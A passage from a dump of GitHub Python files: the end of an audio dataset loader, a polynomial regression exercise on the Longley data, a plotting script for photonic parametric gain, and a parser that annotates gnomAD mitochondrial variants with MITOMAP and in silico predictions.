mixed.shape[1]]\n elif target.shape[1] < mixed.shape[1]:\n logging.warning(\n \"Target length is shorter than mixed length. Padding target.\"\n )\n target = np.pad(\n target,\n ((0, 0), (0, mixed.shape[1] - target.shape[1])),\n mode=\"constant\",\n )\n\n if self.sample_rate != 44100:\n mixed_resampled, target_resampled = [], []\n for i in range(mixed.shape[0]):\n mixed_resampled.append(\n librosa.resample(\n mixed[i], target_sr=44100, orig_sr=self.sample_rate\n )\n )\n mixed = np.array(mixed_resampled)\n if target is not None:\n for i in range(target.shape[0]):\n target_resampled.append(\n librosa.resample(\n target[i], target_sr=44100, orig_sr=self.sample_rate\n )\n )\n target = np.array(target_resampled)\n\n if self.wav_sample_len is not None:\n mixed, target = self.wav_sample(mixed, target)\n\n if self.norm:\n mixed_max = np.max(np.abs(mixed))\n mixed = mixed / mixed_max\n if target is not None:\n target = target / mixed_max\n\n if not self.testing:\n return_data = (\n torch.tensor(mixed, dtype=torch.float32),\n torch.tensor(target, dtype=torch.float32),\n )\n else:\n return_data = (\n torch.tensor(mixed, dtype=torch.float32),\n self.scene_list[item],\n )\n\n return return_data\n\n def __len__(self):\n return len(self.scene_list)\n","repo_name":"claritychallenge/clarity","sub_path":"clarity/dataset/cec1_dataset.py","file_name":"cec1_dataset.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"60"} +{"seq_id":"40415597121","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nfrom sklearn.datasets import make_classification\nfrom sklearn.neighbors import NearestCentroid\n\ndef adjR(x, y, degree):\n results = {}\n coeffs = np.polyfit(x, y, degree)\n p = np.poly1d(coeffs)\n yhat = p(x)\n ybar = np.sum(y)/len(y)\n ssreg = np.sum((yhat-ybar)**2)\n sstot = np.sum((y - ybar)**2)\n results['r_squared'] = 1- (((1-(ssreg/sstot))*(len(y)-1))/(len(y)-degree-1))\n\n return results\n\nif __name__ == '__main__':\n longleyData = pd.read_csv('longley.csv')\n\n print(longleyData)\n employ = 'Employed'\n gnp = 'GNP'\n\n longleyData.plot.scatter(x=employ,\n y=gnp,\n c='Red')\n plt.show()\n\n employData = longleyData[employ]\n gnpdata = longleyData[gnp]\n\n pz1 = np.poly1d(np.polyfit(employData, gnpdata, 1))\n pz2 = np.poly1d(np.polyfit(employData, gnpdata, 2))\n pz3 = np.poly1d(np.polyfit(employData, gnpdata, 3))\n pz4 = np.poly1d(np.polyfit(employData, gnpdata, 4))\n pz5 = np.poly1d(np.polyfit(employData, gnpdata, 5))\n pz10 = np.poly1d(np.polyfit(employData, gnpdata, 10))\n\n xp = np.linspace(min(employData), max(employData))\n plt.xlabel('Employed')\n plt.ylabel('GNP')\n _ = plt.plot(employData, gnpdata, '.', xp, pz4(xp), '-', xp)\n plt.xlim(min(employData) - 5, max(employData) + 5)\n plt.ylim(min(gnpdata) - 10, max(gnpdata) + 10)\n plt.show()\n\n\n plt.plot(xp, pz1(xp), color='green')\n plt.plot(xp, pz2(xp), color='blue')\n plt.plot(xp, pz3(xp), color='red')\n plt.plot(xp, pz4(xp), color='yellow')\n plt.plot(xp, pz5(xp), color='purple')\n plt.plot(xp, pz10(xp), color='orange')\n plt.show()\n\n print(adjR(employData, gnpdata, 1))\n print(adjR(employData, gnpdata, 2))\n print(adjR(employData, gnpdata, 3))\n print(adjR(employData, gnpdata, 4))\n print(adjR(employData, gnpdata, 5))\n print(adjR(employData, gnpdata, 10))\n\n norm_pz1 = np.linalg.norm(pz1)\n print(norm_pz1)\n\n newY = []\n newX = []\n for i in range(1, 10):\n newX.append(i)\n r = np.linalg.norm(employData, ord=i)\n print(r)\n newY.append(r)\n\n plt.scatter(newX, newY, c='red')\n plt.show()\n\n\n\n\n","repo_name":"dulda280/ML4Media","sub_path":"ML4MEDIA/lecture4.py","file_name":"lecture4.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43623588976","text":"import numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.interpolate import make_interp_spline, BSpline\r\nplt.style.use(['science','nature'])\r\n\r\nlevel0 = 16\r\nalpha0 = 1\r\ncmap1 = sns.color_palette(\"magma\", as_cmap=True)\r\ncmap2 = sns.color_palette(\"mako\", as_cmap=True)\r\n\r\n\r\nk = 0\r\neta = 1\r\nx_s = 0\r\n\r\nc = 3e10 # Speed of light in cm / s\r\ngamma = 2.4e-15 # cm/W\r\nng = 1.85 # Refractive index of Silicon at 1.55um. \r\nvg = c/ng # Group velocity\r\ntheta = 0.00144 # Assuming a set % of power is coupled to ring from bus \r\nLambda_rp = 1550e-7 # cm 1550 nm \r\nwr = 2 * np.pi * c / Lambda_rp # rad/s 1550 nm\r\nalpha_dB = 0.1\r\nRadius = 100e-4 # good choose for critical coupling \r\ntR = (2 * np.pi * Radius) / vg\r\ndndt = 2.5e-5\r\nAeff = 1.15e-8\r\ntau_th = 1.354e-6\r\ndelta_T = dndt*2*np.pi/(Lambda_rp)\r\ngamma = gamma*2*np.pi/Lambda_rp\r\npi = np.pi\r\n\r\ndef Linear_response(r1,alpha_dB1):\r\n alpha1 = np.log(10)/10*alpha_dB1\r\n return alpha1\r\ndef photonlifetime(r2,theta2,alpha_dB1):\r\n r2 = r2\r\n tR = (2 * np.pi * r2) / vg\r\n L = 2*np.pi*r2\r\n Loss = Linear_response(r2,alpha_dB1)*L + theta2\r\n return tR/Loss\r\n\r\nloss = Linear_response(Radius,alpha_dB)*2*np.pi*Radius\r\ntau_ph = photonlifetime(Radius,theta,alpha_dB)\r\nwarning = (8*theta*gamma*vg*(tau_ph**3))\r\nnormal_in = ((tR**2)/warning)**(0.5)\r\nnormal_T = 1/(2*delta_T*vg*tau_ph)\r\nnorma_f = (2*gamma*vg*tau_ph)**(-0.5)\r\n\r\nFSR = vg / (2 * pi * Radius) # Free Spectral range of the ring\r\nBeta_GVD = 0.00114362*(1e-24/1e2) # 0.00114362 #-0.1714\r\nEta_gvd = -c/ng*((2*pi*FSR)**2)*Beta_GVD\r\nnormal_t = np.sqrt(abs(Beta_GVD)*vg*tau_ph)\r\nS = 1e-3/(Aeff*(normal_in**2))\r\n\r\na1 = (1)\r\na0 = -S\r\np = [a1,a0]\r\nSolution = np.roots(p)\r\nsolution1 = np.array( [ num for num in Solution if np.angle(num) == 0 ])\r\nx = max(solution1)\r\nx = (x*(norma_f**2)*Aeff)*1e3\r\nS = (S*(normal_in**2)*Aeff)*1e3\r\nB = x/S\r\n\r\ndef solv_eq(delta, p):\r\n p1 = p\r\n p2 = p\r\n phase = (delta - ((2+x_s)*(p1+p2)))\r\n if np.sign(phase) == np.sign(eta):\r\n k = np.sqrt(abs(phase))\r\n else:\r\n k = 0 \r\n det = p1*p2 - ((phase - (eta*(k**2)))**2)\r\n if det < 0:\r\n gain = -1 \r\n else: \r\n gain = np.sqrt(det) - 1\r\n if gain < 0:\r\n gain = gain \r\n return gain\r\ndef solv_eq1(delta, p):\r\n p1 = p\r\n p2 = p\r\n phase = (delta - ((2+x_s)*(p1+p2)))\r\n if np.sign(phase) == np.sign(eta):\r\n k = np.sqrt(abs(phase))\r\n else:\r\n k = 0 \r\n det = p1*p2 - ((phase - (eta*(k**2)))**2)\r\n if det < 0:\r\n gain = 1 \r\n else:\r\n gain = np.sqrt(det) - 1\r\n if gain < 0:\r\n gain = 1 \r\n else: \r\n gain = \"NaN\"\r\n return gain\r\n\r\ndef solv_eq2(delta):\r\n if delta < 0:\r\n return \"NaN\"\r\n return delta/(2*(2+x_s))*(norma_f**2)*Aeff\r\n########################################################################\r\n\r\nk0 = 30*1e9*(2*np.pi)*2*tau_ph\r\nD = np.linspace(-1*k0, k0, 300)\r\npower = np.linspace(-1*k0, k0, 300)\r\np1 = 0 / ((norma_f**2)*Aeff)\r\np2 = (200e-3*B)/ ((norma_f**2)*Aeff)\r\nP = np.linspace(p1, p2, 300)\r\nZ0 = np.zeros((len(P),(len(D))))\r\nZ1= np.zeros((len(P),(len(D))))\r\nphase = np.zeros(len(D))\r\npower = np.zeros(len(D))\r\n\r\nphase1 = np.load(\"p00.npy\")\r\nphase2 = np.load(\"p01.npy\")\r\nphase3 = np.load(\"p02.npy\")\r\nphase4 = np.load(\"p03.npy\")\r\nphase5 = np.load(\"p10.npy\")\r\nphase6 = np.load(\"p11.npy\")\r\nphase7 = np.load(\"p12.npy\")\r\nphase8 = np.load(\"p13.npy\")\r\n\r\nthreshold1 = np.load(\"t00.npy\")\r\nthreshold2 = np.load(\"t01.npy\")\r\nthreshold3 = np.load(\"t02.npy\")\r\nthreshold4 = np.load(\"t03.npy\")\r\nthreshold5 = np.load(\"t10.npy\")\r\nthreshold6 = np.load(\"t11.npy\")\r\nthreshold7 = np.load(\"t12.npy\")\r\nthreshold8 = np.load(\"t13.npy\")\r\n\r\nfor i in range(0,len(P)):\r\n P[i] = P[i]*(norma_f**2)*Aeff/B*1e3\r\n \r\nfor i in range(0,len(D)):\r\n D[i] = (D[i]/(2*tau_ph))/(2*np.pi)/1e9\r\n \r\nX, Y = np.meshgrid(D, P)\r\n\r\nZ1 = np.load(\"g00.npy\")\r\nZ2 = np.load(\"g01.npy\")\r\nZ3 = np.load(\"g02.npy\")\r\nZ4 = np.load(\"g03.npy\")\r\nZ5 = np.load(\"g10.npy\")\r\nZ6 = np.load(\"g11.npy\")\r\nZ7 = np.load(\"g12.npy\")\r\nZ8 = np.load(\"g13.npy\")\r\n\r\nsma11= np.nanmin(Z1)\r\nsma12= np.nanmin(Z2)\r\nsma13= np.nanmin(Z3)\r\nsma14= np.nanmin(Z4)\r\nsmal1 = min(sma11,sma12,sma13,sma14)\r\n\r\n#lar11= np.nanmax(Z1)\r\n#lar12= np.nanmax(Z2)\r\n#lar13= np.nanmax(Z3)\r\n#lar14= np.nanmax(Z4)\r\n#larl1 = min(lar11,lar12,lar13,lar14)\r\n\r\nX, Y = np.meshgrid(D, P)\r\nl0 = 12\r\nfig, axes = plt.subplots(nrows=2, ncols=4,sharex='col', sharey='row' ,constrained_layout=True,figsize=(10, 5))\r\n# First column heatmaps with same colormap\r\n\r\npcm1 = axes[0, 0].contour(X, Y, Z1,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm1 = axes[0, 0].contourf(X, Y, Z1, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 0].plot(D,phase1,\"beige\",linestyle=\"dashed\")\r\naxes[0, 0].text(2.6, 100, r\" $\\bar\\Gamma = 0$\", color=\"beige\",fontsize=10)\r\naxes[0, 0].plot(D,threshold1,\"pink\",linestyle=\"dashed\")\r\naxes[0, 0].text(-15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 0].set_title(r'$\\alpha$ = 0.1 dB/cm without TOE', fontsize=12)\r\naxes[0, 0].axis(ymin=0,ymax=200)\r\n\r\npcm2 = axes[0, 1].contour(X, Y, Z2,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm2 = axes[0, 1].contourf(X, Y, Z2, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 1].plot(D,phase2,\"beige\",linestyle=\"dashed\")\r\naxes[0, 1].text(5.8, 100, r\" $\\bar\\Gamma = 0$\", color=\"beige\", fontsize=10)\r\naxes[0, 1].plot(D,threshold2,\"pink\",linestyle=\"dashed\")\r\naxes[0, 1].text(-15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 1].axis(ymin=0,ymax=200)\r\naxes[0, 1].set_title(r'$\\alpha$ = 0.1 dB/cm with TOE', fontsize=12)\r\n\r\nclb = fig.colorbar(pcm2, ax=axes[0,0:2], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\n \r\n# First column colorbar - slicing selects all rows, first column\r\n# Second column heatmaps with same colormap\r\npcm3 = axes[0, 2].contour(X, Y, Z3,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm3= axes[0, 2].contourf(X, Y, Z3, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 2].plot(D,phase3,\"beige\",linestyle=\"dashed\")\r\naxes[0, 2].text(-4.8, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\",fontsize=10)\r\naxes[0, 2].plot(D,threshold3,\"pink\",linestyle=\"dashed\")\r\naxes[0, 2].text(-15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 2].axis(ymin=0,ymax=200)\r\naxes[0, 2].set_title(r'$\\alpha$ = 0.3 dB/cm without TOE', fontsize=12)\r\n\r\npcm4= axes[0, 3].contour(X, Y, Z4, alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm4= axes[0, 3].contourf(X, Y, Z4, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 3].plot(D,phase4,\"beige\",linestyle=\"dashed\")\r\naxes[0, 3].text(-1.7, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[0, 3].plot(D,threshold4,\"pink\",linestyle=\"dashed\")\r\naxes[0, 3].text(-15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 3].axis(ymin=0,ymax=200)\r\naxes[0, 3].set_title(r'$\\alpha$ = 0.3 dB/cm with TOE', fontsize=12)\r\n\r\nclb = fig.colorbar(pcm4, ax=axes[0, 3:5], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\n\r\n# Second column colorbar - slicing selects all rows, second column\r\n# Half the size of the first colorbar\r\npcm5 = axes[1, 0].contour(X, Y, Z5,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm5= axes[1, 0].contourf(X, Y, Z5,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 0].plot(D,phase5,\"beige\",linestyle=\"dashed\")\r\naxes[1, 0].text(17.5, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\",fontsize=10)\r\naxes[1, 0].plot(D,threshold5,\"pink\",linestyle=\"dashed\")\r\naxes[1, 0].text(15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 0].axis(ymin=0,ymax=200)\r\n\r\npcm6= axes[1,1].contour(X, Y, Z6,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm6= axes[1, 1].contourf(X, Y, Z6,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 1].plot(D,phase6,\"beige\",linestyle=\"dashed\")\r\naxes[1, 1].text(20.8, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[1, 1].plot(D,threshold6,\"pink\",linestyle=\"dashed\")\r\naxes[1, 1].text(15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 1].axis(ymin=0,ymax=200)\r\nclb = fig.colorbar(pcm6, ax=axes[1, 0:2], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\npcm7= axes[1,2].contour(X, Y, Z7,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm7= axes[1, 2].contourf(X, Y, Z7,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 2].plot(D,phase7,\"beige\",linestyle=\"dashed\")\r\naxes[1, 2].text(7, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[1, 2].plot(D,threshold7,\"pink\",linestyle=\"dashed\")\r\naxes[1, 2].text(15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 2].axis(ymin=0,ymax=200)\r\n\r\npcm8= axes[1,3].contour(X, Y, Z8,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm8= axes[1, 3].contourf(X, Y, Z8,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 3].plot(D,phase8,\"beige\",linestyle=\"dashed\")\r\naxes[1, 3].text(10.3, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[1, 3].plot(D,threshold8,\"pink\",linestyle=\"dashed\")\r\naxes[1, 3].text(15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 3].axis(ymin=0,ymax=200)\r\nclb = fig.colorbar(pcm8, ax=axes[1, 3:5], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\n\r\nfor ax in axes.flat:\r\n ax.tick_params(axis=\"x\", labelsize=11)\r\n ax.tick_params(axis=\"y\", labelsize=11)\r\n \r\n# Second column colorbar - slicing selects all rows, second column\r\n# Half the size of the first colorbar\r\n\r\nfig.supxlabel(r\"Pump detuning $\\Delta_{r}$ (GHz)\",fontsize=13)\r\nfig.supylabel(r\"Pump power $P_{i}$ (mW)\",fontsize=13)\r\n\r\n# clb.ax.tick_params(labelsize=8) \r\n# clb.ax.set_title(r\"Gain coefficient $g$\",fontsize=8)\r\n# cs11 = plt.contourf(X, Y, Z1,alpha=1,cmap=\"Blues\",levels = 2)\r\n# fig.supxlabel(r\"Red pump detuning $\\Delta_{r}$ (GHz)\",fontsize=9)\r\n# fig.supylabel(r\"Blue pump detuning $\\Delta_{b}$ (GHz)\",fontsize=9)\r\n# plt.title(r\"Parametric gain coefficient $g$\")\r\nplt.savefig(\"s4t1.png\",dpi=500,bbox_inches='tight')\r\nplt.show()\r\n# cs11 = plt.contour(X, Y, Z0,alpha=1,colors='white',levels = level0, linewidths= 0.3)\r\n# cs11 = plt.contourf(X, Y, Z0,alpha=1,cmap=\"PiYG\",extend=\"both\",levels = level0)\r\n# # plt.plot([1, 2, 3, 4], [1, 4, 9, 16], 'ro')\r\n# plt.plot(D,phase,\"beige\")\r\n# plt.text(7.3, 50, r\" $\\bar\\Gamma = 0$\", color=\"beige\", fontsize=level0)\r\n# plt.ylim((0,100))\r\n# # plt.clabel(cs1, colors = 'k', fmt = '%2.1f', fontsize=10)\r\n# clb = plt.colorbar()\r\n# # clb.ax.tick_params(labelsize=8) \r\n# clb.set_label(r\"Gain coefficient $g$\",fontsize=level0)\r\n# # cs11 = plt.contourf(X, Y, Z1,alpha=1,cmap=\"Blues\",levels = 2)\r\n# plt.xlabel(r\"Signal detuning $\\Delta_{s}$ (GHz)\",fontsize=level0)\r\n# plt.ylabel(r\"Intracavity power $P_{c}$ (W)\",fontsize=level0)\r\n# # plt.title(r\"Parametric gain coefficient $g$\")\r\n# np.save(\"glevel0.npy\",Z0)\r\n# plt.savefig(\"glevel0.png\",dpi=1000,bbox_inches='tight')\r\n# plt.show()","repo_name":"menglonghephd/Si3N4_DOPO","sub_path":"Gain.py","file_name":"Gain.py","file_ext":"py","file_size_in_byte":11102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74251093951","text":"#!/usr/bin/python\n\nimport argparse\nimport csv\nimport decimal\nimport gzip\nimport itertools\nimport json\nimport sys\nfrom typing import Dict, Tuple\n\n\ncsv.field_size_limit(sys.maxsize)\n\n\"\"\"gather additional annotations for gnomAD mitochondrial variants, not in VCF:\nMITOMAP: disease-associated variants, and database allele frequencies\nAPOGEE: in silico prediction for non-synonymous variants\nHmtVar: in silico prediction for tRNA variants\"\"\"\n\n\ndef in_mitomap(other_databases_path: str):\n \"\"\"Extract a disease-associated variant list, and GenBank allele frequencies from MITOMAP database.\n\n :param other_databases_path: path to the other_databases directory with required files\n :return: mitomap_counts and matches_disease dictionaries with relevant information\n \"\"\"\n mitomap_counts = {}\n matches_disease = {}\n\n with open(other_databases_path + \"MITOMAP_polymorphisms_02022021.cgi\") as csv_file:\n var_list = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n for row in var_list: # for each variant in mitomap\n # need to use allele counts (named \"gbcnt\") to convert to allele frequency, as if gbcnt = 1, gbfreq is written as 0.0 (rounded) in MITOMAP, total used for denominator n=51836\n mitomap_counts[str(row[\"pos\"]), str(row[\"ref\"]), str(row[\"alt\"])] = float(\n decimal.Decimal(row[\"gbcnt\"]) / 51836\n )\n\n with open(other_databases_path + \"MITOMAP_disease_02012021.cgi\") as csv_file:\n var_list = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n for row in var_list:\n if (\n str(row[\"pos\"]),\n str(row[\"ref\"]),\n str(row[\"alt\"]),\n ) not in mitomap_counts:\n mitomap_counts[\n str(row[\"pos\"]), str(row[\"ref\"]), str(row[\"alt\"])\n ] = float(decimal.Decimal(row[\"gbcnt\"]) / 51836)\n if (row[\"status\"] == \"Cfrm\") or (\n row[\"status\"] == \"Reported\"\n ): # gather disease-associated variants\n matches_disease[str(row[\"pos\"]), str(row[\"ref\"]), str(row[\"alt\"])] = (\n row[\"status\"],\n row[\"heteroplasmy\"],\n row[\"homoplasmy\"],\n row[\"disease\"],\n )\n\n return (mitomap_counts, matches_disease)\n\n\ndef apogee(insilicos_path: str):\n \"\"\"Extract APOGEE in silico predictions for non-synonymous variants.\n\n :param insilicos_path: path to the insilicos directory with required file\n :return: matches_apogee dictionary with APOGEE prediction for every variant\n \"\"\"\n with open(insilicos_path + \"MitImpact_db_3.0.6.txt\") as mitimpact:\n mitimpact = csv.DictReader(mitimpact, delimiter=\"\\t\")\n\n matches_apogee = {}\n\n for row in mitimpact:\n matches_apogee[\n (row[\"Start\"], row[\"Ref\"], row[\"Alt\"], row[\"Gene_symbol\"])\n ] = row[\"APOGEE\"]\n\n return matches_apogee\n\n\ndef hmtvar_annotations(insilicos_path: str):\n \"\"\"Extract HmtVar in silico predictions for tRNA variants, retrieved via API using get_hmtvar.py.\n\n :param insilicos_path: path to the insilicos directory with required file\n :return: matches_hmtvar dictionary with HmtVar prediction for every variant\n \"\"\"\n with open(insilicos_path + \"hmtvar_annotations.txt\") as hmtvar:\n hmtvar = csv.DictReader(hmtvar, delimiter=\"\\t\")\n\n matches_hmtvar = {}\n\n for row in hmtvar:\n insilico = \"\"\n # extract the in silico prediction from the annotation\n if len(row[\"HmtVar\"]) > 3:\n annotation = json.loads(row[\"HmtVar\"])\n insilico = str(annotation[\"pathogenicity\"])\n\n matches_hmtvar[(row[\"POS\"], row[\"REF\"], row[\"ALT\"])] = insilico\n\n return matches_hmtvar\n\n\n\"\"\"extract relevant data from gnomAD sample sheet and VCF:\nhaplogroup of each sample, heteroplasmy of each variant call, haplogroup associated with each variant call, allele frequencies and maximum heteroplasmy, and vep annotations\"\"\"\n\n\ndef samples(gnomAD_path: str):\n \"\"\"Create dictionary of sample ID and haplogroup.\n\n :param gnomAD_path: path to the gnomAD VCF\n :return: matches_samples dictionary with the haplogroup of every sample\n \"\"\"\n with open(gnomAD_path + \"t21/sample_annotations_gnomad.txt\") as csv_file:\n samples = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n matches_samples = {}\n\n for row in samples:\n matches_samples[row[\"s\"]] = row[\"hap\"]\n\n return matches_samples\n\n\ndef parse_vcf(matches_samples: Dict[str, str], gnomAD_path: str):\n \"\"\"VCF with genotype and heteroplasmy level data for each sample, not publicly available.\n\n :param matches_samples: dictionary generated by samples function\n :param gnomAD_path: path to the gnomAD VCF\n :return: matches_annotations, matches_insilico dictionaries linking relevant VCF annotations and in silicos predictions to each observed variant\n :return: matches_base, matches_codon dictionaries with maximum heteroplasmy observed at each base and codon\n \"\"\"\n with gzip.open(\n gnomAD_path + \"t21/sample_annotations_gnomad.vcf.bgz\", mode=\"rt\"\n ) as tsv_file:\n vcf = csv.reader(tsv_file, delimiter=\"\\t\")\n # vep annotations are per header\n header = \"Allele|Consequence|IMPACT|SYMBOL|Gene|Feature_type|Feature|BIOTYPE|EXON|INTRON|HGVSc|HGVSp|cDNA_position|CDS_position|Protein_position|Amino_acids|Codons|ALLELE_NUM|DISTANCE|STRAND|VARIANT_CLASS|MINIMISED|SYMBOL_SOURCE|HGNC_ID|CANONICAL|TSL|APPRIS|CCDS|ENSP|SWISSPROT|TREMBL|UNIPARC|GENE_PHENO|SIFT|PolyPhen|DOMAINS|HGVS_OFFSET|MOTIF_NAME|MOTIF_POS|HIGH_INF_POS|MOTIF_SCORE_CHANGE|LoF|LoF_filter|LoF_flags|LoF_info\"\n matches_annotations = (\n {}\n ) # extracting vep, allele frequencies, maximum heteroplasmy and other annotations from VCF\n matches_base = {} # this is the maximum heteroplasmy of a SNV at each base\n matches_codon = (\n {}\n ) # this is the maximum heteroplasmy of a non-synonymous SNV at each codon in protein-coding genes\n matches_insilico = {} # extracting in silico annotations in VCF\n sample_ids = (\n {}\n ) # this is used to annotate the haplogroup of the individuals the variant is called in\n\n for row_index, row in enumerate(\n itertools.islice(vcf, 68, None)\n ): # row with header and sample IDs is 69 for t21\n all_het = [] # resets every row/variant\n haplos = []\n # this step extracts the heteroplasmy level of variant calls, and the haplogroup of the samples with the variant call\n if (row[6] == \"PASS\") or (row_index == 0): # pass only sites and header\n for col_index, cell in enumerate(\n itertools.islice(row, 9, None)\n ): # start from column 10, the first column with sample genotype data\n if row_index == 0: # ie if the first row (the header)\n sample_ids[\n col_index\n ] = cell # building a dictionary of the sample IDs\n else:\n genotype = cell.split(\":\")[0]\n if (genotype == \"0/1\") or (genotype == \"1/1\"):\n col_header = sample_ids[col_index] # sample\n haplogroup = matches_samples[\n col_header\n ] # haplogroup of sample\n haplos.append(haplogroup)\n heteroplasmy = cell.split(\":\")[2]\n all_het.append(heteroplasmy)\n\n if row[6] == \"PASS\":\n POS = row[1]\n REF = row[3]\n ALT = row[4]\n # will convert annotations in row[7] (column 8) to dictionary using = and ; separators\n # first need to handle annotations that don't have = separators\n # also handle the use of = in synonymous HVGSp (within vep field)\n if \"hap_defining_variant;\" in row[7]:\n row[7] = row[7].replace(\n \"hap_defining_variant;\", \"hap_defining_variant=yes;\"\n )\n else:\n row[7] = row[7] + \";hap_defining_variant=no\"\n if \"common_low_heteroplasmy;\" in row[7]:\n row[7] = row[7].replace(\n \"common_low_heteroplasmy;\", \"common_low_heteroplasmy=yes;\"\n )\n else:\n row[7] = row[7] + \";common_low_heteroplasmy=no\"\n if \"=|\" in row[7]: # synonymous variants\n row[7] = row[7].replace(\"=|\", \"|\")\n info = dict(\n (k.strip(), v.strip())\n for k, v in (item.split(\"=\") for item in row[7].split(\";\"))\n )\n max_hl = info[\"max_hl\"]\n VARIANT_CLASS = info[\"vep\"].split(\"|\")[20]\n SYMBOL = info[\"vep\"].split(\"|\")[3]\n BIOTYPE = info[\"vep\"].split(\"|\")[7]\n Consequence = info[\"vep\"].split(\"|\")[1]\n Protein_position = info[\"vep\"].split(\"|\")[14] # residue/codon\n HGVSc = info[\"vep\"].split(\"|\")[10]\n HGVSp = info[\"vep\"].split(\"|\")[11]\n\n max_hap_AF_hom = max_pop_AF_hom = 0.0 # reset each variant\n # maximum AF_hom per haplogroup, and per population\n for value in info[\"hap_AF_hom\"].split(\"|\"):\n if (value != \".\") and (float(value) >= float(max_hap_AF_hom)):\n max_hap_AF_hom = value\n for value in info[\"pop_AF_hom\"].split(\"|\"):\n if (value != \".\") and (float(value) >= float(max_pop_AF_hom)):\n max_pop_AF_hom = value\n\n matches_annotations[POS, REF, ALT, SYMBOL] = (\n max_hl,\n info[\"AN\"],\n info[\"AC_hom\"],\n info[\"AC_het\"],\n info[\"AF_hom\"],\n info[\"AF_het\"],\n info[\"faf_hapmax_hom\"],\n VARIANT_CLASS,\n SYMBOL,\n BIOTYPE,\n Consequence,\n Protein_position,\n HGVSc,\n HGVSp,\n all_het,\n haplos,\n max_hap_AF_hom,\n max_pop_AF_hom,\n )\n\n # for max heteroplasmy at base, SNVs only\n # for every SNV - if the base position of the variant is not in the matches_base dictionary,\n # or if the max_hl for the variant position in the dictionary is lower than the max_hl value for this variant (at the same position)\n # the variant's max_hl will be set as the maximum heteroplasmy for the base position\n if VARIANT_CLASS == \"SNV\":\n if (not POS in matches_base) or (matches_base[POS] < max_hl):\n matches_base[POS] = max_hl\n # for max heteroplasmy at codon, for SNVs in protein-coding genes only\n # for every non-synonymous SNV - if the codon (Protein_position) of the variant in the gene (SYMBOL) is not in the matches_codon dictionary,\n # or if the max_hl for the codon in the dictionary is lower than the max_hl value for this non-synonymous variant (at the same codon)\n # the variants's max_hl will be set as the maximum heteroplasmy for the codon\n if (\n (BIOTYPE == \"protein_coding\")\n and (VARIANT_CLASS == \"SNV\")\n and (Consequence != \"synonymous_variant\")\n ):\n if (not (SYMBOL, Protein_position) in matches_codon) or (\n matches_codon[(SYMBOL, Protein_position)] < max_hl\n ):\n matches_codon[(SYMBOL, Protein_position)] = max_hl\n # tRNA in silicos in VCF\n if (BIOTYPE == \"Mt_tRNA\") and (VARIANT_CLASS == \"SNV\"):\n if not (SYMBOL, POS, ALT) in matches_insilico:\n matches_insilico[(SYMBOL, POS, ALT)] = (\n info[\"mitotip_trna_prediction\"],\n info[\"pon_mt_trna_prediction\"],\n )\n\n if info[\"vep\"].count(\"|\") > header.count(\n \"|\"\n ): # then is two annotations, variant lies in two genes\n SYMBOL = info[\"vep\"].split(\"|\")[\n 48\n ] # plus 45, header.count('|') = 44\n BIOTYPE = info[\"vep\"].split(\"|\")[52]\n Consequence = info[\"vep\"].split(\"|\")[46]\n Protein_position = info[\"vep\"].split(\"|\")[59]\n HGVSc = info[\"vep\"].split(\"|\")[55]\n HGVSp = info[\"vep\"].split(\"|\")[56]\n\n # create a second entry 